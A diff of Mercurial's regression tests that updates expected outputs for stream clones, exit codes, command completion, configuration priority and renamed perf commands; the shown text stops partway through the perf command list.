+++ b/tests/test-churn.t Tue Apr 20 11:01:06 2021 -0400
@@ -195,3 +195,22 @@
alltogether 11 *********************************************************
$ cd ..
+
+count lines that look like headings but are not
+
+ $ hg init not-headers
+ $ cd not-headers
+ $ cat > a <<EOF
+ > diff
+ > @@ -195,3 +195,21 @@
+ > -- a/tests/test-churn.t
+ > ++ b/tests/test-churn.t
+ > EOF
+ $ hg ci -Am adda -u user1
+ adding a
+ $ hg churn --diffstat
+ user1 +4/-0 ++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ $ hg rm a
+ $ hg ci -Am removea -u user1
+ $ hg churn --diffstat
+ user1 +4/-4 +++++++++++++++++++++++++++---------------------------
--- a/tests/test-clone-uncompressed.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-clone-uncompressed.t Tue Apr 20 11:01:06 2021 -0400
@@ -73,7 +73,6 @@
remote-changegroup
http
https
- rev-branch-cache
$ hg clone --stream -U http://localhost:$HGPORT server-disabled
warning: stream clone requested but server has them disabled
@@ -141,7 +140,6 @@
remote-changegroup
http
https
- rev-branch-cache
$ hg clone --stream -U http://localhost:$HGPORT server-disabled
warning: stream clone requested but server has them disabled
@@ -171,7 +169,7 @@
$ killdaemons.py
$ cd server
- $ hg serve -p $HGPORT -d --pid-file=hg.pid
+ $ hg serve -p $HGPORT -d --pid-file=hg.pid --error errors.txt
$ cat hg.pid > $DAEMON_PIDS
$ cd ..
@@ -180,16 +178,21 @@
#if stream-legacy
$ hg clone --stream -U http://localhost:$HGPORT clone1
streaming all changes
- 1027 files to transfer, 96.3 KB of data
- transferred 96.3 KB in * seconds (*/sec) (glob)
+ 1027 files to transfer, 96.3 KB of data (no-zstd !)
+ transferred 96.3 KB in * seconds (*/sec) (glob) (no-zstd !)
+ 1027 files to transfer, 93.5 KB of data (zstd !)
+ transferred 93.5 KB in * seconds (* */sec) (glob) (zstd !)
searching for changes
no changes found
+ $ cat server/errors.txt
#endif
#if stream-bundle2
$ hg clone --stream -U http://localhost:$HGPORT clone1
streaming all changes
- 1030 files to transfer, 96.5 KB of data
- transferred 96.5 KB in * seconds (* */sec) (glob)
+ 1030 files to transfer, 96.5 KB of data (no-zstd !)
+ transferred 96.5 KB in * seconds (*/sec) (glob) (no-zstd !)
+ 1030 files to transfer, 93.6 KB of data (zstd !)
+ transferred 93.6 KB in * seconds (* */sec) (glob) (zstd !)
$ ls -1 clone1/.hg/cache
branch2-base
@@ -203,6 +206,7 @@
rbc-revs-v1
tags2
tags2-served
+ $ cat server/errors.txt
#endif
getbundle requests with stream=1 are uncompressed
@@ -213,39 +217,68 @@
$ f --size --hex --bytes 256 body
- body: size=112262
+ body: size=112262 (no-zstd !)
+ body: size=109410 (zstd no-rust !)
+ body: size=109431 (rust !)
0000: 04 6e 6f 6e 65 48 47 32 30 00 00 00 00 00 00 00 |.noneHG20.......|
- 0010: 7f 07 53 54 52 45 41 4d 32 00 00 00 00 03 00 09 |..STREAM2.......|
- 0020: 05 09 04 0c 44 62 79 74 65 63 6f 75 6e 74 39 38 |....Dbytecount98|
- 0030: 37 37 35 66 69 6c 65 63 6f 75 6e 74 31 30 33 30 |775filecount1030|
+ 0010: 7f 07 53 54 52 45 41 4d 32 00 00 00 00 03 00 09 |..STREAM2.......| (no-zstd !)
+ 0020: 05 09 04 0c 44 62 79 74 65 63 6f 75 6e 74 39 38 |....Dbytecount98| (no-zstd !)
+ 0030: 37 37 35 66 69 6c 65 63 6f 75 6e 74 31 30 33 30 |775filecount1030| (no-zstd !)
+ 0010: 99 07 53 54 52 45 41 4d 32 00 00 00 00 03 00 09 |..STREAM2.......| (zstd no-rust !)
+ 0010: ae 07 53 54 52 45 41 4d 32 00 00 00 00 03 00 09 |..STREAM2.......| (rust !)
+ 0020: 05 09 04 0c 5e 62 79 74 65 63 6f 75 6e 74 39 35 |....^bytecount95| (zstd no-rust !)
+ 0020: 05 09 04 0c 73 62 79 74 65 63 6f 75 6e 74 39 35 |....sbytecount95| (rust !)
+ 0030: 38 39 37 66 69 6c 65 63 6f 75 6e 74 31 30 33 30 |897filecount1030| (zstd !)
0040: 72 65 71 75 69 72 65 6d 65 6e 74 73 64 6f 74 65 |requirementsdote|
0050: 6e 63 6f 64 65 25 32 43 66 6e 63 61 63 68 65 25 |ncode%2Cfncache%|
0060: 32 43 67 65 6e 65 72 61 6c 64 65 6c 74 61 25 32 |2Cgeneraldelta%2|
- 0070: 43 72 65 76 6c 6f 67 76 31 25 32 43 73 70 61 72 |Crevlogv1%2Cspar|
- 0080: 73 65 72 65 76 6c 6f 67 25 32 43 73 74 6f 72 65 |serevlog%2Cstore|
- 0090: 00 00 80 00 73 08 42 64 61 74 61 2f 30 2e 69 00 |....s.Bdata/0.i.|
- 00a0: 03 00 01 00 00 00 00 00 00 00 02 00 00 00 01 00 |................|
- 00b0: 00 00 00 00 00 00 01 ff ff ff ff ff ff ff ff 80 |................|
- 00c0: 29 63 a0 49 d3 23 87 bf ce fe 56 67 92 67 2c 69 |)c.I.#....Vg.g,i|
- 00d0: d1 ec 39 00 00 00 00 00 00 00 00 00 00 00 00 75 |..9............u|
- 00e0: 30 73 08 42 64 61 74 61 2f 31 2e 69 00 03 00 01 |0s.Bdata/1.i....|
- 00f0: 00 00 00 00 00 00 00 02 00 00 00 01 00 00 00 00 |................|
+ 0070: 43 72 65 76 6c 6f 67 76 31 25 32 43 73 70 61 72 |Crevlogv1%2Cspar| (no-zstd !)
+ 0080: 73 65 72 65 76 6c 6f 67 25 32 43 73 74 6f 72 65 |serevlog%2Cstore| (no-zstd !)
+ 0090: 00 00 80 00 73 08 42 64 61 74 61 2f 30 2e 69 00 |....s.Bdata/0.i.| (no-zstd !)
+ 00a0: 03 00 01 00 00 00 00 00 00 00 02 00 00 00 01 00 |................| (no-zstd !)
+ 00b0: 00 00 00 00 00 00 01 ff ff ff ff ff ff ff ff 80 |................| (no-zstd !)
+ 00c0: 29 63 a0 49 d3 23 87 bf ce fe 56 67 92 67 2c 69 |)c.I.#....Vg.g,i| (no-zstd !)
+ 00d0: d1 ec 39 00 00 00 00 00 00 00 00 00 00 00 00 75 |..9............u| (no-zstd !)
+ 00e0: 30 73 08 42 64 61 74 61 2f 31 2e 69 00 03 00 01 |0s.Bdata/1.i....| (no-zstd !)
+ 00f0: 00 00 00 00 00 00 00 02 00 00 00 01 00 00 00 00 |................| (no-zstd !)
+ 0070: 43 72 65 76 6c 6f 67 2d 63 6f 6d 70 72 65 73 73 |Crevlog-compress| (zstd no-rust !)
+ 0070: 43 70 65 72 73 69 73 74 65 6e 74 2d 6e 6f 64 65 |Cpersistent-node| (rust !)
+ 0080: 69 6f 6e 2d 7a 73 74 64 25 32 43 72 65 76 6c 6f |ion-zstd%2Crevlo| (zstd no-rust !)
+ 0080: 6d 61 70 25 32 43 72 65 76 6c 6f 67 2d 63 6f 6d |map%2Crevlog-com| (rust !)
+ 0090: 67 76 31 25 32 43 73 70 61 72 73 65 72 65 76 6c |gv1%2Csparserevl| (zstd no-rust !)
+ 0090: 70 72 65 73 73 69 6f 6e 2d 7a 73 74 64 25 32 43 |pression-zstd%2C| (rust !)
+ 00a0: 6f 67 25 32 43 73 74 6f 72 65 00 00 80 00 73 08 |og%2Cstore....s.| (zstd no-rust !)
+ 00a0: 72 65 76 6c 6f 67 76 31 25 32 43 73 70 61 72 73 |revlogv1%2Cspars| (rust !)
+ 00b0: 42 64 61 74 61 2f 30 2e 69 00 03 00 01 00 00 00 |Bdata/0.i.......| (zstd no-rust !)
+ 00b0: 65 72 65 76 6c 6f 67 25 32 43 73 74 6f 72 65 00 |erevlog%2Cstore.| (rust !)
+ 00c0: 00 00 00 00 02 00 00 00 01 00 00 00 00 00 00 00 |................| (zstd no-rust !)
+ 00c0: 00 80 00 73 08 42 64 61 74 61 2f 30 2e 69 00 03 |...s.Bdata/0.i..| (rust !)
+ 00d0: 01 ff ff ff ff ff ff ff ff 80 29 63 a0 49 d3 23 |..........)c.I.#| (zstd no-rust !)
+ 00d0: 00 01 00 00 00 00 00 00 00 02 00 00 00 01 00 00 |................| (rust !)
+ 00e0: 87 bf ce fe 56 67 92 67 2c 69 d1 ec 39 00 00 00 |....Vg.g,i..9...| (zstd no-rust !)
+ 00e0: 00 00 00 00 00 01 ff ff ff ff ff ff ff ff 80 29 |...............)| (rust !)
+ 00f0: 00 00 00 00 00 00 00 00 00 75 30 73 08 42 64 61 |.........u0s.Bda| (zstd no-rust !)
+ 00f0: 63 a0 49 d3 23 87 bf ce fe 56 67 92 67 2c 69 d1 |c.I.#....Vg.g,i.| (rust !)
--uncompressed is an alias to --stream
#if stream-legacy
$ hg clone --uncompressed -U http://localhost:$HGPORT clone1-uncompressed
streaming all changes
- 1027 files to transfer, 96.3 KB of data
- transferred 96.3 KB in * seconds (*/sec) (glob)
+ 1027 files to transfer, 96.3 KB of data (no-zstd !)
+ transferred 96.3 KB in * seconds (*/sec) (glob) (no-zstd !)
+ 1027 files to transfer, 93.5 KB of data (zstd !)
+ transferred 93.5 KB in * seconds (* */sec) (glob) (zstd !)
searching for changes
no changes found
#endif
#if stream-bundle2
$ hg clone --uncompressed -U http://localhost:$HGPORT clone1-uncompressed
streaming all changes
- 1030 files to transfer, 96.5 KB of data
- transferred 96.5 KB in * seconds (* */sec) (glob)
+ 1030 files to transfer, 96.5 KB of data (no-zstd !)
+ transferred 96.5 KB in * seconds (* */sec) (glob) (no-zstd !)
+ 1030 files to transfer, 93.6 KB of data (zstd !)
+ transferred 93.6 KB in * seconds (* */sec) (glob) (zstd !)
#endif
Clone with background file closing enabled
@@ -257,10 +290,12 @@
sending branchmap command
streaming all changes
sending stream_out command
- 1027 files to transfer, 96.3 KB of data
+ 1027 files to transfer, 96.3 KB of data (no-zstd !)
+ 1027 files to transfer, 93.5 KB of data (zstd !)
starting 4 threads for background file closing
updating the branch cache
- transferred 96.3 KB in * seconds (*/sec) (glob)
+ transferred 96.3 KB in * seconds (*/sec) (glob) (no-zstd !)
+ transferred 93.5 KB in * seconds (* */sec) (glob) (zstd !)
query 1; heads
sending batch command
searching for changes
@@ -287,12 +322,15 @@
bundle2-input-bundle: with-transaction
bundle2-input-part: "stream2" (params: 3 mandatory) supported
applying stream bundle
- 1030 files to transfer, 96.5 KB of data
+ 1030 files to transfer, 96.5 KB of data (no-zstd !)
+ 1030 files to transfer, 93.6 KB of data (zstd !)
starting 4 threads for background file closing
starting 4 threads for background file closing
updating the branch cache
- transferred 96.5 KB in * seconds (* */sec) (glob)
- bundle2-input-part: total payload size 112094
+ transferred 96.5 KB in * seconds (* */sec) (glob) (no-zstd !)
+ bundle2-input-part: total payload size 112094 (no-zstd !)
+ transferred 93.6 KB in * seconds (* */sec) (glob) (zstd !)
+ bundle2-input-part: total payload size 109216 (zstd !)
bundle2-input-part: "listkeys" (params: 1 mandatory) supported
bundle2-input-bundle: 2 parts total
checking for updated bookmarks
@@ -324,16 +362,20 @@
#if stream-legacy
$ hg clone --stream -U http://localhost:$HGPORT secret-allowed
streaming all changes
- 1027 files to transfer, 96.3 KB of data
- transferred 96.3 KB in * seconds (*/sec) (glob)
+ 1027 files to transfer, 96.3 KB of data (no-zstd !)
+ transferred 96.3 KB in * seconds (*/sec) (glob) (no-zstd !)
+ 1027 files to transfer, 93.5 KB of data (zstd !)
+ transferred 93.5 KB in * seconds (* */sec) (glob) (zstd !)
searching for changes
no changes found
#endif
#if stream-bundle2
$ hg clone --stream -U http://localhost:$HGPORT secret-allowed
streaming all changes
- 1030 files to transfer, 96.5 KB of data
- transferred 96.5 KB in * seconds (* */sec) (glob)
+ 1030 files to transfer, 96.5 KB of data (no-zstd !)
+ transferred 96.5 KB in * seconds (* */sec) (glob) (no-zstd !)
+ 1030 files to transfer, 93.6 KB of data (zstd !)
+ transferred 93.6 KB in * seconds (* */sec) (glob) (zstd !)
#endif
$ killdaemons.py
@@ -368,7 +410,7 @@
remote: abort: server has pull-based clones disabled
abort: pull failed on remote
(remove --pull if specified or upgrade Mercurial)
- [255]
+ [100]
Local stream clone with secrets involved
(This is just a test over behavior: if you have access to the repo's files,
@@ -391,14 +433,35 @@
extension for delaying the server process so we reliably can modify the repo
while cloning
- $ cat > delayer.py <<EOF
- > import time
- > from mercurial import extensions, vfs
- > def __call__(orig, self, path, *args, **kwargs):
- > if path == 'data/f1.i':
- > time.sleep(2)
- > return orig(self, path, *args, **kwargs)
- > extensions.wrapfunction(vfs.vfs, '__call__', __call__)
+ $ cat > stream_steps.py <<EOF
+ > import os
+ > import sys
+ > from mercurial import (
+ > encoding,
+ > extensions,
+ > streamclone,
+ > testing,
+ > )
+ > WALKED_FILE_1 = encoding.environ[b'HG_TEST_STREAM_WALKED_FILE_1']
+ > WALKED_FILE_2 = encoding.environ[b'HG_TEST_STREAM_WALKED_FILE_2']
+ >
+ > def _test_sync_point_walk_1(orig, repo):
+ > testing.write_file(WALKED_FILE_1)
+ >
+ > def _test_sync_point_walk_2(orig, repo):
+ > assert repo._currentlock(repo._lockref) is None
+ > testing.wait_file(WALKED_FILE_2)
+ >
+ > extensions.wrapfunction(
+ > streamclone,
+ > '_test_sync_point_walk_1',
+ > _test_sync_point_walk_1
+ > )
+ > extensions.wrapfunction(
+ > streamclone,
+ > '_test_sync_point_walk_2',
+ > _test_sync_point_walk_2
+ > )
> EOF
prepare repo with small and big file to cover both code paths in emitrevlogdata
@@ -407,20 +470,32 @@
$ touch repo/f1
$ $TESTDIR/seq.py 50000 > repo/f2
$ hg -R repo ci -Aqm "0"
- $ hg serve -R repo -p $HGPORT1 -d --pid-file=hg.pid --config extensions.delayer=delayer.py
+ $ HG_TEST_STREAM_WALKED_FILE_1="$TESTTMP/sync_file_walked_1"
+ $ export HG_TEST_STREAM_WALKED_FILE_1
+ $ HG_TEST_STREAM_WALKED_FILE_2="$TESTTMP/sync_file_walked_2"
+ $ export HG_TEST_STREAM_WALKED_FILE_2
+ $ HG_TEST_STREAM_WALKED_FILE_3="$TESTTMP/sync_file_walked_3"
+ $ export HG_TEST_STREAM_WALKED_FILE_3
+# $ cat << EOF >> $HGRCPATH
+# > [hooks]
+# > pre-clone=rm -f "$TESTTMP/sync_file_walked_*"
+# > EOF
+ $ hg serve -R repo -p $HGPORT1 -d --error errors.log --pid-file=hg.pid --config extensions.stream_steps="$RUNTESTDIR/testlib/ext-stream-clone-steps.py"
$ cat hg.pid >> $DAEMON_PIDS
clone while modifying the repo between stating file with write lock and
actually serving file content
- $ hg clone -q --stream -U http://localhost:$HGPORT1 clone &
- $ sleep 1
+ $ (hg clone -q --stream -U http://localhost:$HGPORT1 clone; touch "$HG_TEST_STREAM_WALKED_FILE_3") &
+ $ $RUNTESTDIR/testlib/wait-on-file 10 $HG_TEST_STREAM_WALKED_FILE_1
$ echo >> repo/f1
$ echo >> repo/f2
$ hg -R repo ci -m "1" --config ui.timeout.warn=-1
- $ wait
+ $ touch $HG_TEST_STREAM_WALKED_FILE_2
+ $ $RUNTESTDIR/testlib/wait-on-file 10 $HG_TEST_STREAM_WALKED_FILE_3
$ hg -R clone id
000000000000
+ $ cat errors.log
$ cd ..
Stream repository with bookmarks
@@ -439,8 +514,10 @@
#if stream-legacy
$ hg clone --stream http://localhost:$HGPORT with-bookmarks
streaming all changes
- 1027 files to transfer, 96.3 KB of data
- transferred 96.3 KB in * seconds (*) (glob)
+ 1027 files to transfer, 96.3 KB of data (no-zstd !)
+ transferred 96.3 KB in * seconds (*) (glob) (no-zstd !)
+ 1027 files to transfer, 93.5 KB of data (zstd !)
+ transferred 93.5 KB in * seconds (* */sec) (glob) (zstd !)
searching for changes
no changes found
updating to branch default
@@ -449,8 +526,10 @@
#if stream-bundle2
$ hg clone --stream http://localhost:$HGPORT with-bookmarks
streaming all changes
- 1033 files to transfer, 96.6 KB of data
- transferred 96.6 KB in * seconds (* */sec) (glob)
+ 1033 files to transfer, 96.6 KB of data (no-zstd !)
+ transferred 96.6 KB in * seconds (* */sec) (glob) (no-zstd !)
+ 1033 files to transfer, 93.8 KB of data (zstd !)
+ transferred 93.8 KB in * seconds (* */sec) (glob) (zstd !)
updating to branch default
1025 files updated, 0 files merged, 0 files removed, 0 files unresolved
#endif
@@ -469,8 +548,10 @@
#if stream-legacy
$ hg clone --stream http://localhost:$HGPORT phase-publish
streaming all changes
- 1027 files to transfer, 96.3 KB of data
- transferred 96.3 KB in * seconds (*) (glob)
+ 1027 files to transfer, 96.3 KB of data (no-zstd !)
+ transferred 96.3 KB in * seconds (*) (glob) (no-zstd !)
+ 1027 files to transfer, 93.5 KB of data (zstd !)
+ transferred 93.5 KB in * seconds (* */sec) (glob) (zstd !)
searching for changes
no changes found
updating to branch default
@@ -479,8 +560,10 @@
#if stream-bundle2
$ hg clone --stream http://localhost:$HGPORT phase-publish
streaming all changes
- 1033 files to transfer, 96.6 KB of data
- transferred 96.6 KB in * seconds (* */sec) (glob)
+ 1033 files to transfer, 96.6 KB of data (no-zstd !)
+ transferred 96.6 KB in * seconds (* */sec) (glob) (no-zstd !)
+ 1033 files to transfer, 93.8 KB of data (zstd !)
+ transferred 93.8 KB in * seconds (* */sec) (glob) (zstd !)
updating to branch default
1025 files updated, 0 files merged, 0 files removed, 0 files unresolved
#endif
@@ -505,8 +588,10 @@
$ hg clone --stream http://localhost:$HGPORT phase-no-publish
streaming all changes
- 1027 files to transfer, 96.3 KB of data
- transferred 96.3 KB in * seconds (*) (glob)
+ 1027 files to transfer, 96.3 KB of data (no-zstd !)
+ transferred 96.3 KB in * seconds (* */sec) (glob) (no-zstd !)
+ 1027 files to transfer, 93.5 KB of data (zstd !)
+ transferred 93.5 KB in * seconds (* */sec) (glob) (zstd !)
searching for changes
no changes found
updating to branch default
@@ -518,8 +603,10 @@
#if stream-bundle2
$ hg clone --stream http://localhost:$HGPORT phase-no-publish
streaming all changes
- 1034 files to transfer, 96.7 KB of data
- transferred 96.7 KB in * seconds (* */sec) (glob)
+ 1034 files to transfer, 96.7 KB of data (no-zstd !)
+ transferred 96.7 KB in * seconds (* */sec) (glob) (no-zstd !)
+ 1034 files to transfer, 93.9 KB of data (zstd !)
+ transferred 93.9 KB in * seconds (* */sec) (glob) (zstd !)
updating to branch default
1025 files updated, 0 files merged, 0 files removed, 0 files unresolved
$ hg -R phase-no-publish phase -r 'all()'
@@ -563,8 +650,10 @@
$ hg clone -U --stream http://localhost:$HGPORT with-obsolescence
streaming all changes
- 1035 files to transfer, 97.1 KB of data
- transferred 97.1 KB in * seconds (* */sec) (glob)
+ 1035 files to transfer, 97.1 KB of data (no-zstd !)
+ transferred 97.1 KB in * seconds (* */sec) (glob) (no-zstd !)
+ 1035 files to transfer, 94.3 KB of data (zstd !)
+ transferred 94.3 KB in * seconds (* */sec) (glob) (zstd !)
$ hg -R with-obsolescence log -T '{rev}: {phase}\n'
1: draft
0: draft
@@ -575,7 +664,7 @@
streaming all changes
remote: abort: server has obsolescence markers, but client cannot receive them via stream clone
abort: pull failed on remote
- [255]
+ [100]
$ killdaemons.py
--- a/tests/test-clonebundles.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-clonebundles.t Tue Apr 20 11:01:06 2021 -0400
@@ -279,7 +279,8 @@
$ hg -R server debugcreatestreamclonebundle packed.hg
writing 613 bytes for 4 files
- bundle requirements: generaldelta, revlogv1, sparserevlog
+ bundle requirements: generaldelta, revlogv1, sparserevlog (no-rust !)
+ bundle requirements: generaldelta, persistent-nodemap, revlogv1, sparserevlog (rust !)
No bundle spec should work
@@ -589,9 +590,7 @@
bundle2-input-part: "listkeys" (params: 1 mandatory) supported
bundle2-input-part: "phase-heads" supported
bundle2-input-part: total payload size 24
- bundle2-input-part: "cache:rev-branch-cache" (advisory) supported
- bundle2-input-part: total payload size 59
- bundle2-input-bundle: 4 parts total
+ bundle2-input-bundle: 3 parts total
checking for updated bookmarks
updating the branch cache
added 2 changesets with 2 changes to 2 files
--- a/tests/test-commandserver.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-commandserver.t Tue Apr 20 11:01:06 2021 -0400
@@ -522,7 +522,7 @@
transaction abort!
rollback completed
abort: pretxncommit hook exited with status 1
- [255]
+ [40]
*** runcommand verify
checking changesets
checking manifests
@@ -1013,7 +1013,7 @@
transaction abort!
rollback completed
abort: pretxncommit hook exited with status 1
- [255]
+ [40]
*** runcommand log
*** runcommand verify -q
@@ -1057,7 +1057,7 @@
transaction abort!
rollback completed
abort: pretxncommit hook exited with status 1
- [255]
+ [40]
*** runcommand log
0 bar (bar)
*** runcommand verify -q
--- a/tests/test-commit-amend.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-commit-amend.t Tue Apr 20 11:01:06 2021 -0400
@@ -209,7 +209,7 @@
transaction abort!
rollback completed
abort: pretxncommit.test-saving-last-message hook exited with status 1
- [255]
+ [40]
$ cat .hg/last-message.txt
message given from command line (no-eol)
@@ -234,7 +234,7 @@
transaction abort!
rollback completed
abort: pretxncommit.test-saving-last-message hook exited with status 1
- [255]
+ [40]
$ cat .hg/last-message.txt
another precious commit message
--- a/tests/test-completion.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-completion.t Tue Apr 20 11:01:06 2021 -0400
@@ -38,6 +38,7 @@
paths
phase
pull
+ purge
push
recover
remove
@@ -129,6 +130,7 @@
debugrevspec
debugserve
debugsetparents
+ debugshell
debugsidedata
debugssl
debugstrip
@@ -270,7 +272,7 @@
debugbuilddag: mergeable-file, overwritten-file, new-file
debugbundle: all, part-type, spec
debugcapabilities:
- debugchangedfiles:
+ debugchangedfiles: compute
debugcheckstate:
debugcolor: style
debugcommands:
@@ -281,7 +283,7 @@
debugdate: extended
debugdeltachain: changelog, manifest, dir, template
debugdirstate: nodates, dates, datesort
- debugdiscovery: old, nonheads, rev, seed, ssh, remotecmd, insecure
+ debugdiscovery: old, nonheads, rev, seed, local-as-revs, remote-as-revs, ssh, remotecmd, insecure, template
debugdownload: output
debugextensions: template
debugfileset: rev, all-files, show-matcher, show-stage
@@ -318,6 +320,7 @@
debugrevspec: optimize, show-revs, show-set, show-stage, no-optimized, verify-optimized
debugserve: sshstdio, logiofd, logiofile
debugsetparents:
+ debugshell:
debugsidedata: changelog, manifest, dir
debugssl:
debugstrip: rev, force, no-backup, nobackup, , keep, bookmark, soft
@@ -354,10 +357,11 @@
paths: template
phase: public, draft, secret, force, rev
pull: update, force, confirm, rev, bookmark, branch, ssh, remotecmd, insecure
+ purge: abort-on-err, all, ignored, dirs, files, print, print0, confirm, include, exclude
push: force, rev, bookmark, all-bookmarks, branch, new-branch, pushvars, publish, ssh, remotecmd, insecure
recover: verify
remove: after, force, subrepos, include, exclude, dry-run
- rename: after, at-rev, force, include, exclude, dry-run
+ rename: forget, after, at-rev, force, include, exclude, dry-run
resolve: all, list, mark, unmark, no-status, re-merge, tool, include, exclude, template
revert: all, date, rev, no-backup, interactive, include, exclude, dry-run
rollback: dry-run, force
--- a/tests/test-config.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-config.t Tue Apr 20 11:01:06 2021 -0400
@@ -1,3 +1,17 @@
+Windows needs ';' as a file separator in an environment variable, and MSYS
+doesn't automatically convert it in every case.
+
+#if windows
+ $ path_list_var() {
+ > echo $1 | sed 's/:/;/'
+ > }
+#else
+ $ path_list_var() {
+ > echo $1
+ > }
+#endif
+
+
hide outer repo
$ hg init
@@ -388,3 +402,114 @@
> done
$ HGRCPATH=configs hg config section.key
99
+
+Configuration priority
+======================
+
+setup necessary file
+
+ $ cat > file-A.rc << EOF
+ > [config-test]
+ > basic = value-A
+ > pre-include= value-A
+ > %include ./included.rc
+ > post-include= value-A
+ > [command-templates]
+ > log = "value-A\n"
+ > EOF
+
+ $ cat > file-B.rc << EOF
+ > [config-test]
+ > basic = value-B
+ > [ui]
+ > logtemplate = "value-B\n"
+ > EOF
+
+
+ $ cat > included.rc << EOF
+ > [config-test]
+ > pre-include= value-included
+ > post-include= value-included
+ > EOF
+
+ $ cat > file-C.rc << EOF
+ > %include ./included-alias-C.rc
+ > [ui]
+ > logtemplate = "value-C\n"
+ > EOF
+
+ $ cat > included-alias-C.rc << EOF
+ > [command-templates]
+ > log = "value-included\n"
+ > EOF
+
+
+ $ cat > file-D.rc << EOF
+ > [command-templates]
+ > log = "value-D\n"
+ > %include ./included-alias-D.rc
+ > EOF
+
+ $ cat > included-alias-D.rc << EOF
+ > [ui]
+ > logtemplate = "value-included\n"
+ > EOF
+
+Simple order checking
+---------------------
+
+If file B is read after file A, value from B overwrite value from A.
+
+ $ HGRCPATH=`path_list_var "file-A.rc:file-B.rc"` hg config config-test.basic
+ value-B
+
+Ordering from include
+---------------------
+
+value from an include overwrite value defined before the include, but not the one defined after the include
+
+ $ HGRCPATH="file-A.rc" hg config config-test.pre-include
+ value-included
+ $ HGRCPATH="file-A.rc" hg config config-test.post-include
+ value-A
+
+command line override
+---------------------
+
+ $ HGRCPATH=`path_list_var "file-A.rc:file-B.rc"` hg config config-test.basic --config config-test.basic=value-CLI
+ value-CLI
+
+Alias ordering
+--------------
+
+The official config is now `command-templates.log`, the historical
+`ui.logtemplate` is a valid alternative for it.
+
+When both are defined, The config value read the last "win", this should keep
+being true if the config have other alias. In other word, the config value read
+earlier will be considered "lower level" and the config read later would be
+considered "higher level". And higher level values wins.
+
+ $ HGRCPATH="file-A.rc" hg log -r .
+ value-A
+ $ HGRCPATH="file-B.rc" hg log -r .
+ value-B
+ $ HGRCPATH=`path_list_var "file-A.rc:file-B.rc"` hg log -r .
+ value-B
+
+Alias and include
+-----------------
+
+The pre/post include priority should also apply when tie-breaking alternatives.
+See the case above for details about the two config options used.
+
+ $ HGRCPATH="file-C.rc" hg log -r .
+ value-C
+ $ HGRCPATH="file-D.rc" hg log -r .
+ value-included
+
+command line override
+---------------------
+
+ $ HGRCPATH=`path_list_var "file-A.rc:file-B.rc"` hg log -r . --config ui.logtemplate="value-CLI\n"
+ value-CLI
--- a/tests/test-contrib-perf.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-contrib-perf.t Tue Apr 20 11:01:06 2021 -0400
@@ -78,111 +78,137 @@
list of commands:
- perfaddremove
+ perf::addremove
+ (no help text available)
+ perf::ancestors
(no help text available)
- perfancestors
+ perf::ancestorset
(no help text available)
- perfancestorset
+ perf::annotate
(no help text available)
- perfannotate (no help text available)
- perfbdiff benchmark a bdiff between revisions
- perfbookmarks
+ perf::bdiff benchmark a bdiff between revisions
+ perf::bookmarks
benchmark parsing bookmarks from disk to memory
- perfbranchmap
+ perf::branchmap
benchmark the update of a branchmap
- perfbranchmapload
+ perf::branchmapload
benchmark reading the branchmap
- perfbranchmapupdate
+ perf::branchmapupdate
benchmark branchmap update from for <base> revs to <target>
revs
- perfbundleread
+ perf::bundleread
Benchmark reading of bundle files.
- perfcca (no help text available)
- perfchangegroupchangelog
+ perf::cca (no help text available)
+ perf::changegroupchangelog
Benchmark producing a changelog group for a changegroup.
- perfchangeset
+ perf::changeset
+ (no help text available)
+ perf::ctxfiles
(no help text available)
- perfctxfiles (no help text available)
- perfdiffwd Profile diff of working directory changes
- perfdirfoldmap
+ perf::diffwd Profile diff of working directory changes
+ perf::dirfoldmap
benchmap a 'dirstate._map.dirfoldmap.get()' request
- perfdirs (no help text available)
- perfdirstate benchmap the time of various distate operations
- perfdirstatedirs
+ perf::dirs (no help text available)
+ perf::dirstate
+ benchmap the time of various distate operations
+ perf::dirstatedirs
benchmap a 'dirstate.hasdir' call from an empty 'dirs' cache
- perfdirstatefoldmap
+ perf::dirstatefoldmap
benchmap a 'dirstate._map.filefoldmap.get()' request
- perfdirstatewrite
+ perf::dirstatewrite
benchmap the time it take to write a dirstate on disk
- perfdiscovery
+ perf::discovery
benchmark discovery between local repo and the peer at given
path
- perffncacheencode
+ perf::fncacheencode
(no help text available)
- perffncacheload
+ perf::fncacheload
(no help text available)
- perffncachewrite
+ perf::fncachewrite
(no help text available)
- perfheads benchmark the computation of a changelog heads
- perfhelper-mergecopies
+ perf::heads benchmark the computation of a changelog heads
+ perf::helper-mergecopies
find statistics about potential parameters for
'perfmergecopies'
- perfhelper-pathcopies
+ perf::helper-pathcopies
find statistic about potential parameters for the
'perftracecopies'
- perfignore benchmark operation related to computing ignore
- perfindex benchmark index creation time followed by a lookup
- perflinelogedits
+ perf::ignore benchmark operation related to computing ignore
+ perf::index benchmark index creation time followed by a lookup
+ perf::linelogedits
(no help text available)
- perfloadmarkers
+ perf::loadmarkers
benchmark the time to parse the on-disk markers for a repo
- perflog (no help text available)
- perflookup (no help text available)
- perflrucachedict
+ perf::log (no help text available)
+ perf::lookup (no help text available)
+ perf::lrucachedict
(no help text available)
- perfmanifest benchmark the time to read a manifest from disk and return a
+ perf::manifest
+ benchmark the time to read a manifest from disk and return a
usable
- perfmergecalculate
+ perf::mergecalculate
(no help text available)
- perfmergecopies
+ perf::mergecopies
measure runtime of 'copies.mergecopies'
- perfmoonwalk benchmark walking the changelog backwards
- perfnodelookup
+ perf::moonwalk
+ benchmark walking the changelog backwards
+ perf::nodelookup
(no help text available)
- perfnodemap benchmark the time necessary to look up revision from a cold
+ perf::nodemap
+ benchmark the time necessary to look up revision from a cold
nodemap
- perfparents benchmark the time necessary to fetch one changeset's parents.
- perfpathcopies
+ perf::parents
+ benchmark the time necessary to fetch one changeset's parents.
+ perf::pathcopies
benchmark the copy tracing logic
- perfphases benchmark phasesets computation
- perfphasesremote
+ perf::phases benchmark phasesets computation
+ perf::phasesremote
benchmark time needed to analyse phases of the remote server
- perfprogress printing of progress bars
- perfrawfiles (no help text available)
- perfrevlogchunks
+ perf::progress
+ printing of progress bars
+ perf::rawfiles
+ (no help text available)
+ perf::revlogchunks
Benchmark operations on revlog chunks.
